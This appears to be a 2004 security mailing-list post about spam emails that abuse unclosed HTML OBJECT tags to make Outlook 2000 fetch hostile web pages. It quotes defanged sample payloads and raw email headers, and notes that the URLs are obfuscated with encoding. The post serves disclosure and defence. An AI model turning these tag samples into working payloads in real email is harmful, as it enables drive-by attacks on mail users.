Two questions about the recent OBJECT tag assault in spam messages: 1. Should an email client process an OBJECT tag that has no corresponding /OBJECT? 2. Should an email client process an OBJECT tag that is not even embedded within HTML tags? Apparently the current answer in Outlook is Yes. Two examples below leap to the Web to download very hostile pages from fully patched fully updated Outlook 2000. I have not tested in other versions, but the volume of the incoming spam with these tags suggests other versions are vulnerable too. I don't think this is new ground, but it is very much wild now. ~ inserted in key places to reduce "you sent me spam" notices. From: "Yesenia Edwards" <YMNUDEWDQHFZWU@xxxxxxxxx> To: <blah@xxxxxxxxx> Subject: the email from 2 days ago.. here is my replay.. Date: Mon, 07 Jun 2004 13:29:40 +0600 MIME-Version: 1.0 Content-Type: multipart/alternative; boundary="--6941203962437317574" ----6941203962437317574 Content-Type: text/html; Content-Transfer-Encoding: quoted-printable ~object data=3D"http://www.seductiveones.~biz/easy/orrorr/sock/page.~php"~=20 ----6941203962437317574-- Many other messages have Object tags that look like this: ~object = data=3D"http://www.= 19;ildwincasino= .net/page.php= ;"~ Note they mix "=" and "=3D" in addition to not closing the OBJECT tag. The hostile site URL is often obfuscated through ASCII HTML encoding.
